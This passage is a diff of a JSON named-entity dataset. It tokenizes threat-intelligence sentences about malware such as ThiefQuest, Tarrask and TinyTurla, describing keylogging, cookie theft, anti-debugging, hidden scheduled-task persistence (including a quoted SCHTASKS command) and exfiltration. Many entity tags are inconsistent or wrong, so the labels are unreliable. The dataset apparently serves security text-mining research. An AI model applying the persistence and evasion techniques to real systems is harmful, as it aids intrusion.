"O" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "the", + "ability", + "to", + "identify", + "which", + "anti-virus", + "products,", + "firewalls,", + "and", + "anti-spyware", + "products", + "are", + "in", + "use." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "the", + "ability", + "to", + "inject", + "the", + "<code>LoadLibrary</code>", + "call", + "template", + "DLL", + "into", + "running", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "the", + "ability", + "to", + "identify", + "the", + "Internet", + "Explorer", + "(IE)", + "version", + "on", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "the", + "ability", + "to", + "steal", + "web", + "session", + "cookies", + "from", + "Internet", + "Explorer,", + "Netscape", + "Navigator,", + "FireFox", + "and", + "RealNetworks", + "applications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "the", + "ability", + "to", + "identify", + "hardware", + "information,", + "the", + "computer", + "name,", + "and", + "OS", + "information", + "on", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "the", + "ability", + "to", + "identify", + "the", + "MAC", + "address", + "on", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "the", + "ability", + "to", + "determine", + "local", + "time", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TajMahal", + "has", + "the", + "ability", + "to", + "capture", + "webcam", + "video." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "Tarrask", + "is", + "able", + "to", + "create", + "“hidden”", + "scheduled", + "tasks", + "by", + "deleting", + "the", + "Security", + "Descriptor", + "(`SD`)", + "registry", + "value." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tarrask", + "creates", + "a", + "scheduled", + "task", + "called", + "“WinUpdate”", + "to", + "re-establish", + "any", + "dropped", + "C2", + "connections." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tarrask", + "has", + "masqueraded", + "as", + "executable", + "files", + "such", + "as", + "`winupdate.exe`,", + "`date.exe`,", + "or", + "`win.exe`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Tarrask", + "is", + "able", + "to", + "delete", + "the", + "Security", + "Descriptor", + "(`SD`)", + "registry", + "subkey", + "in", + "order", + "to", + "“hide”", + "scheduled", + "tasks." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tarrask", + "is", + "able", + "to", + "create", + "“hidden”", + "scheduled", + "tasks", + "for", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tarrask", + "leverages", + "token", + "theft", + "to", + "obtain", + "`lsass.exe`", + "security", + "permissions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tarrask", + "may", + "abuse", + "the", + "Windows", + "schtasks", + "command-line", + "tool", + "to", + "create", + "\"hidden\"", + "scheduled", + "tasks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tasklist", + "can", + "be", + "used", + "to", + "discover", + "processes", + "running", + "on", + "a", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tasklist", + "can", + "be", + "used", + "to", + "enumerate", + "security", + "software", + "currently", + "running", + "on", + "a", + "system", + "by", + "process", + "name", + "of", + "known", + "products." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tasklist", + "can", + "be", + "used", + "to", + "discover", + "services", + "running", + "on", + "a", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ThiefQuest", + "uses", + "AppleScript's", + "<code>osascript", + "-e</code>", + "command", + "to", + "launch", + "ThiefQuest's", + "persistence", + "via", + "Launch", + "Agent", + "and", + "Launch", + "Daemon." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "ThiefQuest", + "searches", + "through", + "the", + "<code>/Users/</code>", + "folder", + "looking", + "for", + "executable", + "files.", + "For", + "each", + "executable,", + "ThiefQuest", + "prepends", + "a", + "copy", + "of", + "itself", + "to", + "the", + "beginning", + "of", + "the", + "file.", + "When", + "the", + "file", + "is", + "executed,", + "the", + "ThiefQuest", + "code", + "is", + "executed", + "first.", + "ThiefQuest", + "creates", + "a", + "hidden", + "file,", + "copies", + "the", + "original", + "target", + "executable", + "to", + "the", + "file,", + "then", + "executes", + "the", + "new", + "hidden", + "file", + "to", + "maintain", + "the", + "appearance", + "of", + "normal", + "behavior." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ThiefQuest", + "encrypts", + "a", + "set", + "of", + "file", + "extensions", + "on", + "a", + "host,", + "deletes", + "the", + "original", + "files,", + "and", + "provides", + "a", + "ransom", + "note", + "with", + "no", + "contact", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ThiefQuest", + "uses", + "a", + "function", + "named", + "<code>is_debugging</code>", + "to", + "perform", + "anti-debugging", + "logic.", + "The", + "function", + "invokes", + "<code>sysctl</code>", + "checking", + "the", + "returned", + "value", + "of", + "<code>P_TRACED</code>.", + "ThiefQuest", + "also", + "calls", + "<code>ptrace</code>", + "with", + "the", + "<code>PTRACE_DENY_ATTACH</code>", + "flag", + "to", + "prevent", + "debugging." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ThiefQuest", + "uses", + "the", + "function", + "<code>kill_unwanted</code>", + "to", + "obtain", + "a", + "list", + "of", + "running", + "processes", + "and", + "kills", + "each", + "process", + "matching", + "a", + "list", + "of", + "security", + "related", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ThiefQuest", + "exfiltrates", + "targeted", + "file", + "extensions", + "in", + "the", + "<code>/Users/</code>", + "folder", + "to", + "the", + "command", + "and", + "control", + "server", + "via", + "unencrypted", + "HTTP.", + "Network", + "packets", + "contain", + "a", + "string", + "with", + "two", + "pieces", + "of", + "information:", + "a", + "file", + "path", + "and", + "the", + "contents", + "of", + "the", + "file", + "in", + "a", + "base64", + "encoded", + "string." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ThiefQuest", + "hides", + "a", + "copy", + "of", + "itself", + "in", + "the", + "user's", + "<code>~/Library</code>", + "directory", + "by", + "using", + "a", + "<code>.</code>", + "at", + "the", + "beginning", + "of", + "the", + "file", + "name", + "followed", + "by", + "9", + "random", + "characters." + ], + "ner_tags": [ + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ThiefQuest", + "can", + "download", + "and", + "execute", + "payloads", + "in-memory", + "or", + "from", + "disk." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ThiefQuest", + "uses", + "the", + "<code>CGEventTap</code>", + "functions", + "to", + "perform", + "keylogging." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ThiefQuest", + "installs", + "a", + "launch", + "item", + "using", + "an", + "embedded", + "encrypted", + "launch", + "agent", + "property", + "list", + "template.", + "The", + "plist", + "file", + "is", + "installed", + "in", + "the", + "<code>~/Library/LaunchAgents/</code>", + "folder", + "and", + "configured", + "with", + "the", + "path", + "to", + "the", + "persistent", + "binary", + "located", + "in", + "the", + "<code>~/Library/</code>", + "folder." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "When", + "running", + "with", + "root", + "privileges", + "after", + "a", + "Launch", + "Agent", + "is", + "installed,", + "ThiefQuest", + "installs", + "a", + "plist", + "file", + "to", + "the", + "<code>/Library/LaunchDaemons/</code>", + "folder", + "with", + "the", + "<code>RunAtLoad</code>", + "key", + "set", + "to", + "<code>true</code>", + "establishing", + "persistence", + "as", + "a", + "Launch", + "Daemon." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "ThiefQuest", + "prepends", + "a", + "copy", + "of", + "itself", + "to", + "the", + "beginning", + "of", + "an", + "executable", + "file", + "while", + "maintaining", + "the", + "name", + "of", + "the", + "executable." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ThiefQuest", + "uses", + "various", + "API", + "to", + "perform", + "behaviors", + "such", + "as", + "executing", + "payloads", + "and", + "performing", + "local", + "enumeration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Way", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "ThiefQuest", + "obtains", + "a", + "list", + "of", + "running", + "processes", + "using", + "the", + "function", + "<code>kill_unwanted</code>." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "ThiefQuest", + "uses", + "various", + "API", + "functions", + "such", + "as", + "<code>NSCreateObjectFileImageFromMemory</code>", + "to", + "load", + "and", + "link", + "in-memory", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ThiefQuest", + "uses", + "the", + "<code>kill_unwanted</code>", + "function", + "to", + "get", + "a", + "list", + "of", + "running", + "processes,", + "compares", + "each", + "process", + "with", + "an", + "encrypted", + "list", + "of", + "“unwanted”", + "security", + "related", + "programs,", + "and", + "kills", + "the", + "processes", + "for", + "security", + "related", + "programs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ThiefQuest", + "invokes", + "<code>time</code>", + "call", + "to", + "check", + "the", + "system's", + "time,", + "executes", + "a", + "<code>sleep</code>", + "command,", + "invokes", + "a", + "second", + "<code>time</code>", + "call,", + "and", + "then", + "compares", + "the", + "time", + "difference", + "between", + "the", + "two", + "<code>time</code>", + "calls", + "and", + "the", + "amount", + "of", + "time", + "the", + "system", + "slept", + "to", + "identify", + "the", + "sandbox." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ThiefQuest", + "uploads", + "files", + "via", + "unencrypted", + "HTTP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "ThreatNeedle", + "can", + "collect", + "data", + "and", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ThreatNeedle", + "can", + "decrypt", + "its", + "payload", + "using", + "RC4,", + "AES,", + "or", + "one-byte", + "XORing." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "ThreatNeedle", + "has", + "been", + "compressed", + "and", + "obfuscated", + "using", + "RC4,", + "AES,", + "or", + "XOR." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "ThreatNeedle", + "can", + "obtain", + "file", + "and", + "directory", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "ThreatNeedle", + "can", + "save", + "its", + "configuration", + "data", + "as", + "a", + "RC4-encrypted", + "Registry", + "key", + "under", + "`HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\GameCon`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ThreatNeedle", + "can", + "download", + "additional", + "tools", + "to", + "enable", + "lateral", + "movement." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ThreatNeedle", + "relies", + "on", + "a", + "victim", + "to", + "click", + "on", + "a", + "malicious", + "document", + "for", + "initial", + "execution." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ThreatNeedle", + "chooses", + "its", + "payload", + "creation", + "path", + "from", + "a", + "randomly", + "selected", + "service", + "name", + "from", + "netsvc." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "ThreatNeedle", + "can", + "modify", + "the", + "Registry", + "to", + "save", + "its", + "configuration", + "data", + "as", + "the", + "following", + "RC4-encrypted", + "Registry", + "key:", + "`HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\GameCon`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "ThreatNeedle", + "can", + "be", + "loaded", + "into", + "the", + "Startup", + "folder", + "(`%APPDATA%\\Microsoft\\Windows\\Start", + "Menu\\Programs\\Startup\\OneDrives.lnk`)", + "as", + "a", + "Shortcut", + "file", + "for", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "ThreatNeedle", + "has", + "been", + "distributed", + "via", + "a", + "malicious", + "Word", + "document", + "within", + "a", + "spearphishing", + "email." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "I-SamFile", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "ThreatNeedle", + "can", + "collect", + "system", + "profile", + "information", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ThreatNeedle", + "can", + "run", + "in", + "memory", + "and", + "register", + "its", + "payload", + "as", + "a", + "Windows", + "service." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TinyTurla", + "has", + "the", + "ability", + "to", + "encrypt", + "C2", + "traffic", + "with", + "SSL/TLS." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "B-Features", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "TinyTurla", + "can", + "upload", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TinyTurla", + "can", + "go", + "through", + "a", + "list", + "of", + "C2", + "server", + "IPs", + "and", + "will", + "try", + "to", + "register", + "with", + "each", + "until", + "one", + "responds." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TinyTurla", + "can", + "save", + "its", + "configuration", + "parameters", + "in", + "the", + "Registry." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TinyTurla", + "has", + "the", + "ability", + "to", + "act", + "as", + "a", + "second-stage", + "dropper", + "used", + "to", + "infect", + "the", + "system", + "with", + "additional", + "malware." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TinyTurla", + "has", + "mimicked", + "an", + "existing", + "Windows", + "service", + "by", + "being", + "installed", + "as", + "<code>Windows", + "Time", + "Service</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TinyTurla", + "has", + "been", + "deployed", + "as", + "`w64time.dll`", + "to", + "appear", + "legitimate." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TinyTurla", + "can", + "set", + "its", + "configuration", + "parameters", + "in", + "the", + "Registry." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TinyTurla", + "has", + "used", + "`WinHTTP`,", + "`CreateProcess`,", + "and", + "other", + "APIs", + "for", + "C2", + "communications", + "and", + "other", + "functions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TinyTurla", + "can", + "query", + "the", + "Registry", + "for", + "its", + "configuration", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TinyTurla", + "contacts", + "its", + "C2", + "based", + "on", + "a", + "scheduled", + "timing", + "set", + "in", + "its", + "configuration." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TinyTurla", + "can", + "install", + "itself", + "as", + "a", + "service", + "on", + "compromised", + "machines." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TinyTurla", + "can", + "use", + "HTTPS", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TinyTurla", + "has", + "been", + "installed", + "using", + "a", + ".bat", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "TinyZBot", + "contains", + "functionality", + "to", + "collect", + "information", + "from", + "the", + "clipboard." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TinyZBot", + "can", + "disable", + "Avira", + "anti-virus." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TinyZBot", + "contains", + "keylogger", + "functionality." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "TinyZBot", + "can", + "create", + "a", + "shortcut", + "in", + "the", + "Windows", + "startup", + "folder", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TinyZBot", + "contains", + "screen", + "capture", + "functionality." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "TinyZBot", + "can", + "create", + "a", + "shortcut", + "in", + "the", + "Windows", + "startup", + "folder", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TinyZBot", + "supports", + "execution", + "from", + "the", + "command-line." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TinyZBot", + "can", + "install", + "as", + "a", + "Windows", + "service", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tomiris", + "has", + "the", + "ability", + "to", + "collect", + "recent", + "files", + "matching", + "a", + "hardcoded", + "list", + "of", + "extensions", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tomiris", + "has", + "connected", + "to", + "a", + "signalization", + "server", + "that", + "provides", + "a", + "URL", + "and", + "port,", + "and", + "then", + "Tomiris", + "sends", + "a", + "GET", + "request", + "to", + "that", + "URL", + "to", + "establish", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tomiris", + "can", + "upload", + "files", + "matching", + "a", + "hardcoded", + "set", + "of", + "extensions,", + "such", + "as", + ".doc,", + ".docx,", + ".pdf,", + "and", + ".rar,", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tomiris", + "can", + "download", + "files", + "and", + "execute", + "them", + "on", + "a", + "victim's", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tomiris", + "has", + "used", + "`SCHTASKS", + "/CREATE", + "/SC", + "DAILY", + "/TN", + "StartDVL", + "/TR", + "\"[path", + "to", + "self]\"", + "/ST", + "10:00`", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Tool", + "B-Way", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tomiris", + "has", + "been", + "packed", + "with", + "UPX." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Tomiris", + "has", + "the", + "ability", + "to", + "sleep", + "for", + "at", + "least", + "nine", + "minutes", + "to", + "evade", + "sandbox-based", + "analysis", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tomiris", + "can", + "use", + "HTTP", + "to", + "establish", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tor", + "encapsulates", + "traffic", + "in", + "multiple", + "layers", + "of", + "encryption,", + "using", + "TLS", + "by", + "default." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Traffic", + "traversing", + "the", + "Tor", + "network", + "will", + "be", + "forwarded", + "to", + "multiple", + "nodes", + "before", + "exiting", + "the", + "Tor", + "network", + "and", + "continuing", + "on", + "to", + "its", + "intended", + "destination." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Torisma", + "has", + "used", + "XOR", + "and", + "Base64", + "to", + "decode", + "C2", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Torisma", + "has", + "been", + "Base64", + "encoded", + "and", + "AES", + "encrypted." + ], + "ner_tags": [ + 